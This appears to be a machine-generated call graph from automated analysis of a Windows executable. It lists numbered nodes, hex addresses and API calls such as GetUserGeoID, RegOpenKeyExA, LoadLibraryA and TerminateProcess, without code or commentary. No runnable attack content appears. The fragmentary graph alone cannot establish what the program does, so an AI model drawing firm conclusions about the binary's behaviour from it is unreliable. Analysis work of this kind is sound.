std::ios_base::clear 43 API calls 46763->46764 46765 452027 46764->46765 46766 45202f 46765->46766 46768 45204f 46765->46768 46767 417140 std::ios_base::clear 43 API calls 46766->46767 46767->46731 46769 4186f0 46 API calls 46768->46769 46770 452119 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46769->46770 46771 42c670 2 API calls 46770->46771 46772 452129 46771->46772 46773 417140 std::ios_base::clear 43 API calls 46772->46773 46774 452137 46773->46774 46775 45213f 46774->46775 46777 45215f 46774->46777 46776 417140 std::ios_base::clear 43 API calls 46775->46776 46776->46731 46778 4186f0 46 API calls 46777->46778 46779 452229 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46778->46779 46780 42c670 2 API calls 46779->46780 46781 452239 46780->46781 46782 417140 std::ios_base::clear 43 API calls 46781->46782 46783 452247 46782->46783 46784 45224f 46783->46784 46786 45226f 46783->46786 46785 417140 std::ios_base::clear 43 API calls 46784->46785 46785->46731 46787 4186f0 46 API calls 46786->46787 46788 452339 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46787->46788 46789 42c670 2 API calls 46788->46789 46790 452349 46789->46790 46791 417140 std::ios_base::clear 43 API calls 46790->46791 46792 452357 46791->46792 46793 45235f 46792->46793 46795 45237f 46792->46795 46794 417140 std::ios_base::clear 43 API calls 46793->46794 46794->46731 46796 4186f0 46 API calls 46795->46796 46797 452449 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46796->46797 46798 42c670 2 API calls 46797->46798 46799 452459 46798->46799 46800 417140 std::ios_base::clear 43 API calls 46799->46800 46801 452467 46800->46801 46802 45246f 46801->46802 46804 45248f 46801->46804 46803 417140 std::ios_base::clear 43 API calls 46802->46803 46803->46731 46805 4186f0 46 API calls 46804->46805 46806 452559 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46805->46806 46807 42c670 2 API calls 46806->46807 46808 452569 46807->46808 46809 417140 std::ios_base::clear 43 API calls 46808->46809 46810 452577 46809->46810 46811 45257f 46810->46811 46813 45259f __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 46810->46813 46812 417140 std::ios_base::clear 43 API calls 46811->46812 46812->46731 46814 41a1e0 std::ios_base::clear 46 API calls 46813->46814 46815 45281e 46814->46815 47104 442970 46815->47104 47094 41870e std::ios_base::clear 47093->47094 47095 418744 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 47094->47095 47198 40dc90 45 API calls std::ios_base::clear 47094->47198 47097 41b790 46 API calls 47095->47097 47098 418776 47097->47098 47098->46718 47100 42c682 47099->47100 47103 42c6ae __aulldiv __vswprintf_s_l 47099->47103 47101 42c6b5 GetFileAttributesA 47100->47101 47100->47103 47102 42c6d2 GetLastError 47101->47102 47101->47103 47102->47103 47103->46723 47105 442998 47104->47105 47107 4429cf 47104->47107 47106 53f1aa 3 API calls 47105->47106 47110 4429a2 _Error_objects 47106->47110 47109 442a3a _Error_objects 47107->47109 47201 4f57c0 46 API calls 47107->47201 47111 414fd0 std::ios_base::clear 46 API calls 47109->47111 47110->47107 47199 53f0da 46 API calls _Error_objects 47110->47199 47116 442a64 47111->47116 47113 4429c2 47200 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 47113->47200 47115 442aac 47118 442b34 47115->47118 47202 4ef210 46 API calls 47115->47202 47116->47115 47117 414e70 std::ios_base::clear 46 API calls 47116->47117 47117->47115 47120 417140 std::ios_base::clear 43 API calls 47118->47120 47123 442b3f __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 47120->47123 47121 442ae9 47203 4172e0 46 API calls _Yarn 47121->47203 47124 442cc6 RegOpenKeyExA 47123->47124 47198->47095 47199->47113 47200->47107 47201->47109 47202->47121 47203->47118 47215 46d6e0 47216 46d6ed Concurrency::wait _Error_objects 47215->47216 47217 41a1e0 std::ios_base::clear 46 API calls 47216->47217 47218 46d815 47217->47218 47219 4f5470 46 API calls 47218->47219 47220 46d824 47219->47220 47221 417140 std::ios_base::clear 43 API calls 47220->47221 47222 46d82f Concurrency::wait 47221->47222 47223 41a1e0 std::ios_base::clear 46 API calls 47222->47223 47224 46d960 47223->47224 47225 4f5470 46 API calls 47224->47225 47226 46d96f 47225->47226 47227 417140 std::ios_base::clear 43 API calls 47226->47227 47228 46d97a Concurrency::wait 47227->47228 47229 41a1e0 std::ios_base::clear 46 API calls 47228->47229 47230 46daab 47229->47230 47231 4f5470 46 API calls 47230->47231 47232 46daba 47231->47232 47233 417140 std::ios_base::clear 43 API calls 47232->47233 47234 46dac5 Concurrency::wait 47233->47234 47235 41a1e0 std::ios_base::clear 46 API calls 47234->47235 47236 46dbf6 47235->47236 47237 4f5470 46 API calls 47236->47237 47238 46dc05 47237->47238 47239 417140 std::ios_base::clear 43 API calls 47238->47239 47240 46dc10 Concurrency::wait 47239->47240 47241 41a1e0 std::ios_base::clear 46 API calls 47240->47241 47242 46dd41 47241->47242 47243 4f5470 46 API calls 47242->47243 47244 46dd50 47243->47244 47245 417140 std::ios_base::clear 43 API calls 47244->47245 47246 46dd5b Concurrency::wait 47245->47246 47247 41a1e0 std::ios_base::clear 46 API calls 47246->47247 47248 46de8c 47247->47248 47249 4f5470 46 API calls 47248->47249 47250 46de9b 47249->47250 47251 417140 std::ios_base::clear 43 API calls 47250->47251 47252 46dea6 Concurrency::wait 47251->47252 47253 41a1e0 std::ios_base::clear 46 API calls 47252->47253 47254 46dfd7 47253->47254 47255 4f5470 46 API calls 47254->47255 47256 46dfe6 47255->47256 47257 417140 std::ios_base::clear 43 API calls 47256->47257 47258 46dff1 Concurrency::wait 47257->47258 47259 41a1e0 std::ios_base::clear 46 API calls 47258->47259 47260 46e122 47259->47260 47261 4f5470 46 API calls 47260->47261 47262 46e131 47261->47262 47263 417140 std::ios_base::clear 43 API calls 47262->47263 47264 46e13c Concurrency::wait 47263->47264 47265 41a1e0 std::ios_base::clear 46 API calls 47264->47265 47266 46e26d 47265->47266 47267 4f5470 46 API calls 47266->47267 47268 46e27c 47267->47268 47269 417140 std::ios_base::clear 43 API calls 47268->47269 47270 46e287 Concurrency::wait 47269->47270 47271 41a1e0 std::ios_base::clear 46 API calls 47270->47271 47272 46e3b8 47271->47272 47273 4f5470 46 API calls 47272->47273 47274 46e3c7 47273->47274 47275 417140 std::ios_base::clear 43 API calls 47274->47275 47276 46e3d2 Concurrency::wait 47275->47276 47277 41a1e0 std::ios_base::clear 46 API calls 47276->47277 47278 46e503 47277->47278 47279 4f5470 46 API calls 47278->47279 47280 46e512 47279->47280 47281 417140 std::ios_base::clear 43 API calls 47280->47281 47282 46e51d Concurrency::wait 47281->47282 47283 41a1e0 std::ios_base::clear 46 API calls 47282->47283 47284 46e64e 47283->47284 47285 4f5470 46 API calls 47284->47285 47286 46e65d 47285->47286 47287 417140 std::ios_base::clear 43 API calls 47286->47287 47288 46e668 Concurrency::wait 47287->47288 47289 41a1e0 std::ios_base::clear 46 API calls 47288->47289 47290 46e799 47289->47290 47291 4f5470 46 API calls 47290->47291 47292 46e7a8 47291->47292 47293 417140 std::ios_base::clear 43 API calls 47292->47293 47294 46e7b3 Concurrency::wait 47293->47294 47295 41a1e0 std::ios_base::clear 46 API calls 47294->47295 47296 46e8e4 47295->47296 47297 4f5470 46 API calls 47296->47297 47298 46e8f3 47297->47298 47299 417140 std::ios_base::clear 43 API calls 47298->47299 47300 46e8fe Concurrency::wait 47299->47300 47301 41a1e0 std::ios_base::clear 46 API calls 47300->47301 47302 46ea2f 47301->47302 47303 4f5470 46 API calls 47302->47303 47304 46ea3e 47303->47304 47305 417140 std::ios_base::clear 43 API calls 47304->47305 48067 47eb60 48068 47eb72 Concurrency::wait _Error_objects 48067->48068 48069 41a1e0 std::ios_base::clear 46 API calls 48068->48069 48070 47ec82 48069->48070 48071 4f5470 46 API calls 48070->48071 48072 47ec91 48071->48072 48073 417140 std::ios_base::clear 43 API calls 48072->48073 48074 47ec9c __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 48073->48074 48075 41a1e0 std::ios_base::clear 46 API calls 48074->48075 48076 47eee8 48075->48076 48077 442970 58 API calls 48076->48077 48079 47eef4 Concurrency::wait 48077->48079 48078 47f2ac Concurrency::wait 48080 41a1e0 std::ios_base::clear 46 API calls 48078->48080 48079->48078 48081 41a1e0 std::ios_base::clear 46 API calls 48079->48081 48082 47f3b8 48080->48082 48083 47f064 48081->48083 48084 442970 58 API calls 48082->48084 48085 4f89a0 46 API calls 48083->48085 48091 47f3c4 Concurrency::wait 48084->48091 48086 47f0b5 std::ios_base::clear 48085->48086 48087 414e70 std::ios_base::clear 46 API calls 48086->48087 48088 47f0df std::ios_base::clear 48087->48088 48090 417140 std::ios_base::clear 43 API calls 48088->48090 48089 47f7db Concurrency::wait 48093 41a1e0 std::ios_base::clear 46 API calls 48089->48093 48092 47f0f6 48090->48092 48091->48089 48094 41a1e0 std::ios_base::clear 46 API calls 48091->48094 48095 417140 std::ios_base::clear 43 API calls 48092->48095 48096 47f91a 48093->48096 48097 47f543 48094->48097 48100 47f101 48095->48100 48098 442970 58 API calls 48096->48098 48099 4f89a0 46 API calls 48097->48099 48113 47f926 Concurrency::wait 48098->48113 48101 47f5a3 std::ios_base::clear 48099->48101 48102 4186f0 46 API calls 48100->48102 48104 414e70 std::ios_base::clear 46 API calls 48101->48104 48103 47f1a6 48102->48103 48105 440f20 98 API calls 48103->48105 48106 47f5cd std::ios_base::clear 48104->48106 48121 47f1b5 48105->48121 48110 417140 std::ios_base::clear 43 API calls 48106->48110 48107 47f296 48109 417140 std::ios_base::clear 43 API calls 48107->48109 48108 47fd6c Concurrency::wait 48117 41a1e0 std::ios_base::clear 46 API calls 48108->48117 48111 47f2a1 48109->48111 48112 47f5e4 48110->48112 48114 417140 std::ios_base::clear 43 API calls 48111->48114 48115 417140 std::ios_base::clear 43 API calls 48112->48115 48113->48108 48116 41a1e0 std::ios_base::clear 46 API calls 48113->48116 48114->48078 48126 47f5ef 48115->48126 48118 47fac9 48116->48118 48119 47feab 48117->48119 48127 4f89a0 46 API calls 48118->48127 48122 442970 58 API calls 48119->48122 48120 47f242 48123 4150c0 std::bad_exception::bad_exception 46 API calls 48120->48123 48121->48107 48121->48120 48146 47feb7 Concurrency::wait 48122->48146 48124 47f260 48123->48124 48125 417140 std::ios_base::clear 43 API calls 48124->48125 48128 47f26b 48125->48128 48130 4186f0 46 API calls 48126->48130 48129 47fb29 std::ios_base::clear 48127->48129 48131 417140 std::ios_base::clear 43 API calls 48128->48131 48134 414e70 std::ios_base::clear 46 API calls 48129->48134 48132 47f6b8 48130->48132 48133 47f276 48131->48133 48135 440f20 98 API calls 48132->48135 48136 4f2110 43 API calls 48133->48136 48137 47fb53 std::ios_base::clear 48134->48137 48152 47f6c7 48135->48152 48138 47f281 48136->48138 48143 417140 std::ios_base::clear 43 API calls 48137->48143 48140 4f2110 43 API calls 48138->48140 48139 47f7c5 48142 417140 std::ios_base::clear 43 API calls 48139->48142 48265 47f289 48140->48265 48141 480308 __aulldiv _memcpy_s __vswprintf_s_l 48150 414fd0 std::ios_base::clear 46 API calls 48141->48150 48144 47f7d0 48142->48144 48145 47fb6a 48143->48145 48147 417140 std::ios_base::clear 43 API calls 48144->48147 48148 417140 std::ios_base::clear 43 API calls 48145->48148 48146->48141 48149 41a1e0 std::ios_base::clear 46 API calls 48146->48149 48147->48089 48156 47fb75 48148->48156 48153 48005a 48149->48153 48172 480464 48150->48172 48151 47f763 48154 4150c0 std::bad_exception::bad_exception 46 API calls 48151->48154 48152->48139 48152->48151 48158 4f89a0 46 API calls 48153->48158 48155 47f784 48154->48155 48157 417140 std::ios_base::clear 43 API calls 48155->48157 48161 4186f0 46 API calls 48156->48161 48159 47f78f 48157->48159 48160 4800ba std::ios_base::clear 48158->48160 48162 417140 std::ios_base::clear 43 API calls 48159->48162 48167 414e70 std::ios_base::clear 46 API calls 48160->48167 48163 47fc3e 48161->48163 48164 47f79a 48162->48164 48165 440f20 98 API calls 48163->48165 48166 4f2110 43 API calls 48164->48166 48186 47fc4d 48165->48186 48168 47f7a5 48166->48168 48169 4800e4 std::ios_base::clear 48167->48169 48171 4f2110 43 API calls 48168->48171 48177 417140 std::ios_base::clear 43 API calls 48169->48177 48170 47fd56 48175 417140 std::ios_base::clear 43 API calls 48170->48175 48173 47f7b0 48171->48173 48174 480616 48172->48174 48181 414fd0 std::ios_base::clear 46 API calls 48172->48181 48176 4f2110 43 API calls 48173->48176 48180 4186f0 46 API calls 48174->48180 48178 47fd61 48175->48178 48176->48265 48179 4800fb 48177->48179 48182 417140 std::ios_base::clear 43 API calls 48178->48182 48183 417140 std::ios_base::clear 43 API calls 48179->48183 48184 4806e0 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48180->48184 48185 4805f3 48181->48185 48182->48108 48195 480106 48183->48195 48193 42c670 2 API calls 48184->48193 48188 414e70 std::ios_base::clear 46 API calls 48185->48188 48186->48170 48187 47fce9 48186->48187 48189 4150c0 std::bad_exception::bad_exception 46 API calls 48187->48189 48190 48060b 48188->48190 48192 47fd0a 48189->48192 48191 417140 std::ios_base::clear 43 API calls 48190->48191 48191->48174 48194 417140 std::ios_base::clear 43 API calls 48192->48194 48201 4806f4 48193->48201 48196 47fd15 48194->48196 48198 4186f0 46 API calls 48195->48198 48200 417140 std::ios_base::clear 43 API calls 48196->48200 48197 480900 48199 414fd0 std::ios_base::clear 46 API calls 48197->48199 48202 4801cf 48198->48202 48203 48090d 48199->48203 48204 47fd20 48200->48204 48201->48197 48212 4186f0 46 API calls 48201->48212 48206 440f20 98 API calls 48202->48206 48207 417140 std::ios_base::clear 43 API calls 48203->48207 48205 4f2110 43 API calls 48204->48205 48208 47fd2b 48205->48208 48230 4801de 48206->48230 48209 480918 48207->48209 48210 4f2110 43 API calls 48208->48210 48213 417140 std::ios_base::clear 43 API calls 48209->48213 48214 47fd36 48210->48214 48211 4802f2 48217 417140 std::ios_base::clear 43 API calls 48211->48217 48215 4807c8 48212->48215 48216 480923 48213->48216 48218 4f2110 43 API calls 48214->48218 48219 440f20 98 API calls 48215->48219 48220 4f2110 43 API calls 48216->48220 48221 4802fd 48217->48221 48222 47fd41 48218->48222 48240 4807d7 48219->48240 48223 48092e 48220->48223 48224 417140 std::ios_base::clear 43 API calls 48221->48224 48225 4f2110 43 API calls 48222->48225 48227 4f2110 43 API calls 48223->48227 48224->48141 48225->48265 48226 4808f5 48228 417140 std::ios_base::clear 43 API calls 48226->48228 48231 480939 48227->48231 48228->48197 48229 48027a 48233 4150c0 std::bad_exception::bad_exception 46 API calls 48229->48233 48230->48211 48230->48229 48232 4f2110 43 API calls 48231->48232 48234 480944 48232->48234 48235 48029b 48233->48235 48236 4f2110 43 API calls 48234->48236 48237 417140 std::ios_base::clear 43 API calls 48235->48237 48238 48094f 48236->48238 48239 4802a6 48237->48239 48243 4f2110 43 API calls 48238->48243 48244 417140 std::ios_base::clear 43 API calls 48239->48244 48240->48226 48241 480875 48240->48241 48242 4150c0 std::bad_exception::bad_exception 46 API calls 48241->48242 48246 480896 48242->48246 48243->48265 48245 4802b1 48244->48245 48247 4f2110 43 API calls 48245->48247 48248 417140 std::ios_base::clear 43 API calls 48246->48248 48249 4802bc 48247->48249 48250 4808a1 48248->48250 48251 4f2110 43 API calls 48249->48251 48252 417140 std::ios_base::clear 43 API calls 48250->48252 48253 4802c7 48251->48253 48254 4808ac 48252->48254 48255 4f2110 43 API calls 48253->48255 48256 417140 std::ios_base::clear 43 API calls 48254->48256 48257 4802d2 48255->48257 48258 4808b7 48256->48258 48259 4f2110 43 API calls 48257->48259 48260 4f2110 43 API calls 48258->48260 48261 4802dd 48259->48261 48262 4808c2 48260->48262 48263 4f2110 43 API calls 48261->48263 48264 4f2110 43 API calls 48262->48264 48263->48265 48266 4808cd 48264->48266 48267 4f2110 43 API calls 48266->48267 48268 4808d8 48267->48268 48269 4f2110 43 API calls 48268->48269 48270 4808e3 48269->48270 48271 4f2110 43 API calls 48270->48271 48271->48265 48272 481580 48273 481592 Concurrency::wait _Error_objects 48272->48273 48274 41a1e0 std::ios_base::clear 46 API calls 48273->48274 48275 4816a2 48274->48275 48276 4f5470 46 API calls 48275->48276 48277 4816b1 48276->48277 48278 417140 std::ios_base::clear 43 API calls 48277->48278 48279 4816bc Concurrency::wait 48278->48279 48280 41a1e0 std::ios_base::clear 46 API calls 48279->48280 48281 4817ba 48280->48281 48282 4f5470 46 API calls 48281->48282 48283 4817c9 48282->48283 48284 417140 std::ios_base::clear 43 API calls 48283->48284 48285 4817d4 Concurrency::wait 48284->48285 48286 41a1e0 std::ios_base::clear 46 API calls 48285->48286 48287 4818d2 48286->48287 48288 4f5470 46 API calls 48287->48288 48289 4818e1 48288->48289 48290 417140 std::ios_base::clear 43 API calls 48289->48290 48291 4818ec Concurrency::wait 48290->48291 48292 41a1e0 std::ios_base::clear 46 API calls 48291->48292 48293 481a1d 48292->48293 48294 4f5470 46 API calls 48293->48294 48295 481a2c 48294->48295 48296 417140 std::ios_base::clear 43 API calls 48295->48296 48297 481a37 Concurrency::wait 48296->48297 48298 41a1e0 std::ios_base::clear 46 API calls 48297->48298 48299 481b68 48298->48299 48300 4f5470 46 API calls 48299->48300 48301 481b77 48300->48301 48302 417140 std::ios_base::clear 43 API calls 48301->48302 48303 481b82 Concurrency::wait 48302->48303 48304 41a1e0 std::ios_base::clear 46 API calls 48303->48304 48305 481cb3 48304->48305 48306 4f5470 46 API calls 48305->48306 48307 481cc2 48306->48307 48308 417140 std::ios_base::clear 43 API calls 48307->48308 48309 481ccd Concurrency::wait 48308->48309 48310 41a1e0 std::ios_base::clear 46 API calls 48309->48310 48311 481dfe 48310->48311 48312 4f5470 46 API calls 48311->48312 48313 481e0d 48312->48313 48314 417140 std::ios_base::clear 43 API calls 48313->48314 48315 481e18 Concurrency::wait 48314->48315 48316 41a1e0 std::ios_base::clear 46 API calls 48315->48316 48317 481f49 48316->48317 48318 4f5470 46 API calls 48317->48318 48319 481f58 48318->48319 48320 417140 std::ios_base::clear 43 API calls 48319->48320 48321 481f63 Concurrency::wait 48320->48321 48322 41a1e0 std::ios_base::clear 46 API calls 48321->48322 48323 482094 48322->48323 48324 4f5470 46 API calls 48323->48324 48325 4820a3 48324->48325 48326 417140 std::ios_base::clear 43 API calls 48325->48326 48327 4820ae Concurrency::wait 48326->48327 48328 41a1e0 std::ios_base::clear 46 API calls 48327->48328 48329 4821df 48328->48329 48330 4f5470 46 API calls 48329->48330 48331 4821ee 48330->48331 48332 417140 std::ios_base::clear 43 API calls 48331->48332 48333 4821f9 Concurrency::wait 48332->48333 48334 41a1e0 std::ios_base::clear 46 API calls 48333->48334 48335 48232a 48334->48335 48336 4f5470 46 API calls 48335->48336 48337 482339 48336->48337 48338 417140 std::ios_base::clear 43 API calls 48337->48338 48339 482344 Concurrency::wait 48338->48339 48340 41a1e0 std::ios_base::clear 46 API calls 48339->48340 48341 482475 48340->48341 48342 4f5470 46 API calls 48341->48342 48343 482484 48342->48343 48344 417140 std::ios_base::clear 43 API calls 48343->48344 48345 48248f Concurrency::wait 48344->48345 48346 41a1e0 std::ios_base::clear 46 API calls 48345->48346 48347 4825c0 48346->48347 48348 4f5470 46 API calls 48347->48348 48349 4825cf 48348->48349 48350 417140 std::ios_base::clear 43 API calls 48349->48350 48351 4825da Concurrency::wait 48350->48351 48352 41a1e0 std::ios_base::clear 46 API calls 48351->48352 48353 48270b 48352->48353 48354 4f5470 46 API calls 48353->48354 48355 48271a 48354->48355 48356 417140 std::ios_base::clear 43 API calls 48355->48356 48357 482725 __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 48356->48357 48358 41a1e0 std::ios_base::clear 46 API calls 48357->48358 48359 4829a4 48358->48359 48360 442970 58 API calls 48359->48360 48362 4829b0 Concurrency::wait 48360->48362 48361 482de0 Concurrency::wait 48363 41a1e0 std::ios_base::clear 46 API calls 48361->48363 48362->48361 48362->48362 48364 41a1e0 std::ios_base::clear 46 API calls 48362->48364 48366 482b53 48364->48366 48555 4ee600 48556 4f5470 46 API calls 48555->48556 48557 4ee613 48556->48557 48558 42dc50 GetUserGeoID 48559 42dc7e _memcpy_s 48558->48559 48560 550567 48563 5503d7 48560->48563 48564 550404 48563->48564 48565 550416 48563->48565 48590 53f7c5 GetModuleHandleW 48564->48590 48575 550268 48565->48575 48569 550409 48569->48565 48591 5504b8 GetModuleHandleExW 48569->48591 48570 550453 48576 550274 ___unDNameEx 48575->48576 48597 559a51 EnterCriticalSection 48576->48597 48578 55027e 48598 5502ef 48578->48598 48580 55028b 48602 5502a9 48580->48602 48583 55046e 48607 55049f 48583->48607 48585 550478 48586 55048c 48585->48586 48587 55047c GetCurrentProcess TerminateProcess 48585->48587 48588 5504b8 std::locale::_Setgloballocale 3 API calls 48586->48588 48587->48586 48589 550494 ExitProcess 48588->48589 48590->48569 48592 5504f7 GetProcAddress 48591->48592 48593 550518 48591->48593 48592->48593 48594 55050b 48592->48594 48595 550415 48593->48595 48596 55051e FreeLibrary 48593->48596 48594->48593 48595->48565 48596->48595 48597->48578 48599 5502fb ___unDNameEx std::locale::_Setgloballocale 48598->48599 48601 55035f std::locale::_Setgloballocale 48599->48601 48605 556297 14 API calls 3 library calls 48599->48605 48601->48580 48606 559a99 LeaveCriticalSection 48602->48606 48604 550297 48604->48570 48604->48583 48605->48601 48606->48604 48610 55db81 5 API calls std::locale::_Setgloballocale 48607->48610 48609 5504a4 std::locale::_Setgloballocale 48609->48585 48610->48609 48611 42c9b0 48612 42c9fe __aulldiv __vswprintf_s_l 48611->48612 48613 42cc6a 48612->48613 48615 42cb20 Concurrency::wait 48612->48615 48614 414fd0 std::ios_base::clear 46 API calls 48613->48614 48627 42cc65 48614->48627 48616 41a1e0 std::ios_base::clear 46 API calls 48615->48616 48617 42cbf1 48616->48617 48628 4f4470 48617->48628 48619 42cc0b 48620 417140 std::ios_base::clear 43 API calls 48619->48620 48621 42cc19 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48620->48621 48622 42c670 2 API calls 48621->48622 48623 42cc2a Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48622->48623 48624 42cc4b std::ios_base::clear 48623->48624 48625 42cc47 CreateDirectoryA 48623->48625 48626 417140 std::ios_base::clear 43 API calls 48624->48626 48625->48624 48626->48627 48629 4f4485 48628->48629 48629->48629 48630 4f89a0 46 API calls 48629->48630 48631 4f44b3 std::ios_base::clear 48630->48631 48631->48619 48632 427210 48633 42722d 48632->48633 48698 424730 48633->48698 48635 4272b5 48636 424730 67 API calls 48635->48636 48637 427359 48636->48637 48638 424730 67 API calls 48637->48638 48639 4273fd 48638->48639 48640 424730 67 API calls 48639->48640 48641 4274a1 48640->48641 48642 424730 67 API calls 48641->48642 48643 427544 48642->48643 48644 424730 67 API calls 48643->48644 48645 42760c 48644->48645 48646 424730 67 API calls 48645->48646 48647 4276d4 48646->48647 48648 424730 67 API calls 48647->48648 48649 42779c 48648->48649 48650 424730 67 API calls 48649->48650 48651 427864 48650->48651 48652 424730 67 API calls 48651->48652 48653 42792c 48652->48653 48654 424730 67 API calls 48653->48654 48655 4279f4 48654->48655 48656 424730 67 API calls 48655->48656 48657 427abc 48656->48657 48658 424730 67 API calls 48657->48658 48659 427b84 48658->48659 48660 424730 67 API calls 48659->48660 48661 427c4c 48660->48661 48662 424730 67 API calls 48661->48662 48663 427d14 48662->48663 48664 424730 67 API calls 48663->48664 48665 427ddc 48664->48665 48666 424730 67 API calls 48665->48666 48667 427f76 48666->48667 48668 424730 67 API calls 48667->48668 48671 428041 48668->48671 48669 424730 67 API calls 48670 42837f 48669->48670 48672 424730 67 API calls 48670->48672 48671->48669 48675 42844a 48672->48675 48673 424730 67 API calls 48674 42877c 48673->48674 48676 424730 67 API calls 48674->48676 48675->48673 48677 428844 48676->48677 48678 424730 67 API calls 48677->48678 48679 42890c 48678->48679 48680 424730 67 API calls 48679->48680 48681 4289d4 48680->48681 48682 424730 67 API calls 48681->48682 48683 428a9c 48682->48683 48684 424730 67 API calls 48683->48684 48685 428b64 48684->48685 48686 424730 67 API calls 48685->48686 48687 428c2c 48686->48687 48688 424730 67 API calls 48687->48688 48689 428cf4 48688->48689 48801 425ca0 48689->48801 48691 428dbc 48692 425ca0 70 API calls 48691->48692 48693 428e84 48692->48693 48694 428fff LoadLibraryA 48693->48694 48696 429030 48693->48696 48694->48696 48695 4291d5 48696->48695 48697 4291a4 LoadLibraryA 48696->48697 48697->48695 48699 424768 Concurrency::wait __vswprintf_s_l 48698->48699 48700 41a1e0 std::ios_base::clear 46 API calls 48699->48700 48702 4247fd 48700->48702 48701 42484e 48704 4248df 48701->48704 48904 4ef210 46 API calls 48701->48904 48702->48701 48703 414e70 std::ios_base::clear 46 API calls 48702->48703 48703->48701 48706 417140 std::ios_base::clear 43 API calls 48704->48706 48711 4248ea __aulldiv _memcpy_s __vswprintf_s_l 48706->48711 48707 424894 48905 4172e0 46 API calls _Yarn 48707->48905 48709 4248f0 48709->48635 48711->48709 48906 554c01 44 API calls 2 library calls 48711->48906 48712 425189 48713 53f1aa 3 API calls 48712->48713 48714 425279 48712->48714 48720 42524c _Error_objects 48713->48720 48718 4252f6 48714->48718 48909 4f57c0 46 API calls 48714->48909 48715 425302 lstrcpyA 48717 425329 48715->48717 48722 425360 48715->48722 48719 53f1aa 3 API calls 48717->48719 48718->48715 48728 425333 _Error_objects 48719->48728 48720->48714 48907 53f0da 46 API calls _Error_objects 48720->48907 48726 4253dd 48722->48726 48912 4f57c0 46 API calls 48722->48912 48723 42526c 48908 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48723->48908 48727 425455 lstrcatA 48726->48727 48732 425498 Concurrency::wait 48727->48732 48728->48722 48910 53f0da 46 API calls _Error_objects 48728->48910 48730 425353 48911 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48730->48911 48733 41a1e0 std::ios_base::clear 46 API calls 48732->48733 48735 4254e3 48733->48735 48734 425534 48737 4255c5 48734->48737 48913 4ef210 46 API calls 48734->48913 48735->48734 48736 414e70 std::ios_base::clear 46 API calls 48735->48736 48736->48734 48739 417140 std::ios_base::clear 43 API calls 48737->48739 48741 4255d0 GetModuleHandleA 48739->48741 48740 42557a 48914 4172e0 46 API calls _Yarn 48740->48914 48742 4255f6 48741->48742 48746 42562d 48741->48746 48744 53f1aa 3 API calls 48742->48744 48751 425600 _Error_objects 48744->48751 48753 4256aa 48746->48753 48917 4f57c0 46 API calls 48746->48917 48747 4256cf 48752 42571c 48747->48752 48756 53f1aa 3 API calls 48747->48756 48748 4256bc 48750 54eeae __aligned_free 14 API calls 48748->48750 48754 4256c5 48750->48754 48751->48746 48915 53f0da 46 API calls _Error_objects 48751->48915 48760 4257af Concurrency::wait 48752->48760 48920 4f57c0 46 API calls 48752->48920 48753->48747 48753->48748 48754->48709 48761 4256ef _Error_objects 48756->48761 48758 425620 48916 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48758->48916 48764 41a1e0 std::ios_base::clear 46 API calls 48760->48764 48761->48752 48918 53f0da 46 API calls _Error_objects 48761->48918 48763 42570f 48919 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48763->48919 48766 42581d 48764->48766 48767 42586e 48766->48767 48768 414e70 std::ios_base::clear 46 API calls 48766->48768 48769 4258ff 48767->48769 48921 4ef210 46 API calls 48767->48921 48768->48767 48770 417140 std::ios_base::clear 43 API calls 48769->48770 48773 42590a 48770->48773 48772 4258b4 48922 4172e0 46 API calls _Yarn 48772->48922 48775 4259b1 48773->48775 48776 425999 48773->48776 48778 4259ff 48775->48778 48779 53f1aa 3 API calls 48775->48779 48777 424730 64 API calls 48776->48777 48781 4259a6 Concurrency::wait 48777->48781 48786 425a92 __vswprintf_s_l 48778->48786 48925 4f57c0 46 API calls 48778->48925 48782 4259d2 _Error_objects 48779->48782 48785 41a1e0 std::ios_base::clear 46 API calls 48781->48785 48782->48778 48923 53f0da 46 API calls _Error_objects 48782->48923 48784 4259f2 48924 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48784->48924 48790 425b8a 48785->48790 48926 555871 53 API calls 2 library calls 48786->48926 48789 425b09 48791 424730 64 API calls 48789->48791 48792 425bdb 48790->48792 48793 414e70 std::ios_base::clear 46 API calls 48790->48793 48791->48781 48794 425c6c 48792->48794 48927 4ef210 46 API calls 48792->48927 48793->48792 48795 417140 std::ios_base::clear 43 API calls 48794->48795 48797 425c77 48795->48797 48799 54eeae __aligned_free 14 API calls 48797->48799 48798 425c21 48928 4172e0 46 API calls _Yarn 48798->48928 48799->48754 48802 425cd8 Concurrency::wait __vswprintf_s_l 48801->48802 48803 41a1e0 std::ios_base::clear 46 API calls 48802->48803 48805 425d6d 48803->48805 48804 425dbe 48807 425e4f 48804->48807 48929 4ef210 46 API calls 48804->48929 48805->48804 48806 414e70 std::ios_base::clear 46 API calls 48805->48806 48806->48804 48809 417140 std::ios_base::clear 43 API calls 48807->48809 48814 425e5a __aulldiv _memcpy_s __vswprintf_s_l 48809->48814 48810 425e04 48930 4172e0 46 API calls _Yarn 48810->48930 48812 425e60 48812->48691 48814->48812 48931 554c01 44 API calls 2 library calls 48814->48931 48815 4266f9 48816 53f1aa 3 API calls 48815->48816 48817 4267e9 48815->48817 48823 4267bc _Error_objects 48816->48823 48821 426866 48817->48821 48934 4f57c0 46 API calls 48817->48934 48818 426872 lstrcpyA 48820 426899 48818->48820 48826 4268d0 48818->48826 48822 53f1aa 3 API calls 48820->48822 48821->48818 